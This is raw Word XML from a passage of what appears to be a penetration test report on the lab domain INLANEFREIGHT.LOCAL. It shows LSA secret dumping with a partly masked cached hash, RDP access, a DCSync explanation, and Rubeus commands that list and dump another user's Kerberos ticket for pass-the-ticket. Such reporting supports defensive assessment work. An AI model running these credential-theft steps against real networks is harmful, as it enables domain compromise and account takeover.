                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.220 445    SQL01            INLANEFREIGHT.LOCAL/srvadmin:</w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>DCC2$10240#srvadmin#ef393703f3fabCCCCCa547caffff5f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E04F57" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6950BA55" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59094723" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53FAF802" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.220 445    SQL01            INLANEFREIGHT\srvadmin:&lt;REDACTED&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E094CF3" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25D9F985" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="364624BB" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D426071" w14:textId="1C63941B" w:rsidR="00A40765" w:rsidRPr="00A40765" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.220 445    SQL01            [+] Dumped 10 LSA secrets to /home/mrb3n/.cme/logs/SQL01_192.168.195.220_2022-05-14_081528.secrets and /home/mrb3n/.cme/logs/SQL01_192.168.1</w:t>
            </w:r>
            <w:r w:rsidR="00A40765">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>95.220_2022-05-14_081528.cached</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0663F5E8" w14:textId="6751B56C" w:rsidR="00CF7345" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Dumping Credentials from LSA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E7581" w14:textId="398C5529" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D5536">
        <w:t>Using these credentials, the tester logged into the</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t> SQL01</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:t> host over Remote Desktop (RDP) and noted that another user, </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>pramirez</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:t>, was currently logged in as well.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CF7345" w14:paraId="10BA5B90" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B55C297" w14:textId="5FCF47E4" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>C:\</w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>query user</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6416E4A8" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D4EFE03" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A739208" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>pramirez              rdp-tcp#1           2  Active          3  5/14/2022 8:21 AM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C840B83" w14:textId="33358E3A" w:rsidR="00A40765" w:rsidRPr="00A40765" w:rsidRDefault="003D5536" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&gt;srvadmin              rdp-tcp#2           3  Active          .  5/14/2022 8:24 AM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="585754EA" w14:textId="5EC652B9" w:rsidR="00CF7345" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Checking Logged-in Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256F6F6D" w14:textId="5E53B663" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D5536">
        <w:t>The tester checked the BloodHound tool and noticed that this user had the ability to perform the DCSync attack, which is a technique for stealing the Active Directory password database by leveraging a protocol used by domain controllers to replicate domain data. This attack can be used to retrieve NTLM password hashes for any user in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272E61D7" w14:textId="77777777" w:rsidR="00A40765" w:rsidRDefault="003D5536" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="ImageFormat"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FFB5706" wp14:editId="3834505F">
            <wp:extent cx="6858000" cy="2225040"/>
            <wp:effectExtent l="57150" t="114300" r="114300" b="609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h_pramirez.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2225040"/>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53EFEABA" w14:textId="3197CA8D" w:rsidR="003D5536" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Confirming DCSync Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360CD5B6" w14:textId="2A62371A" w:rsidR="003D5536" w:rsidRDefault="003D5536">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5536">
        <w:t>After connecting, the tester used the Rubeus tool to view all Kerberos tickets currently available on the system and noticed that tickets for the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>pramirez</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:t> user were present.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D5536" w14:paraId="271E6418" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C75BA82" w14:textId="42A50716" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">PS C:\&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.\Rubeus.exe triage</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B80F214" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CD3D5D5"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______        _</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65BF5426"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(_____ \      | |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="780C14BC"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_____) )_   _| |__  _____ _   _  ___</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="028475D3"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  __  /| | | |  _ \| ___ | | | |/___)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA8C724"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 |  \ \| |_| | |_) ) ____| |_| |___ |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BEC7F5B"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   |_|____/|____/|_____)____/(___/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ADE9748" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="285E7B1A"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v2.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BA55508" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20BC03C7" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="67E9A409" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Action: Triage Kerberos Tickets (All Users)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0946D6B3" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7DA733F1" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[*] Current LUID    : 0x256aef</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1280971F" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A322965"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="216AFD2E"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 LUID     | UserName                       | Service                                           | EndTime              |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="207FA05C"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B37AA4F"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 0x256aef | srvadmin @ INLANEFREIGHT.LOCAL | krbtgt/INLANEFREIGHT.LOCAL                        | 5/14/2022 6:24:19 PM |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="018D7E15"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 0x256aef | srvadmin @ INLANEFREIGHT.LOCAL | LDAP/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL | 5/14/2022 6:24:19 PM |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C2A95E4" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> | 0x1a8b19 | pramirez @ INLANEFREIGHT.LOCAL | krbtgt/INLANEFREIGHT.LOCAL                        | 5/14/2022 6:21:35 PM |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78C51063" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> | 0x1a8b19 | pramirez @ INLANEFREIGHT.LOCAL | ProtectedStorage/DC01.INLANEFREIGHT.LOCAL         | 5/14/2022 6:21:35 PM |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B129306" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> | 0x1a8b19 | pramirez @ INLANEFREIGHT.LOCAL | cifs/DC01.INLANEFREIGHT.LOCAL                     | 5/14/2022 6:21:35 PM |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="529F225F" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> | 0x1a8b19 | pramirez @ INLANEFREIGHT.LOCAL | cifs/DC01                                         | 5/14/2022 6:21:35 PM |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DF68482" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> | 0x1a8b19 | pramirez @ INLANEFREIGHT.LOCAL | LDAP/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL | 5/14/2022 6:21:35 PM |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35463B94" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> | 0x1a8ade | pramirez @ INLANEFREIGHT.LOCAL | krbtgt/INLANEFREIGHT.LOCAL                        | 5/14/2022 6:21:35 PM |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31085129" w14:textId="289E0650" w:rsidR="003D5536" w:rsidRDefault="006E291D" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> | 0x1a8ade | pramirez @ INLANEFREIGHT.LOCAL | LDAP/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL | 5/14/2022 6:21:35 PM </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53F2AA29" w14:textId="468B37E1" w:rsidR="003D5536" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Viewing Available Kerberos TIckets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BEF7F9" w14:textId="34070202" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E291D">
        <w:t xml:space="preserve">The tester then used this tool to retrieve the Kerberos TGT ticket for this user which </w:t>
      </w:r>
      <w:r w:rsidR="002C1820">
        <w:t>could</w:t>
      </w:r>
      <w:r w:rsidRPr="006E291D">
        <w:t xml:space="preserve"> then be used to perform a "pass-the-ticket" attack and use the stolen TGT ticket to access resources in the domain.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D5536" w14:paraId="046F21AD" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08D1BBE7" w14:textId="35E628C9" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">PS C:\&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.\Rubeus.exe dump /luid:0x1a8b19 /service:krbtgt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71223886" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48DF61F1"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______        _</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CBD3EBB"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(_____ \      | |</w:t>
            </w:r>
          </w:p>
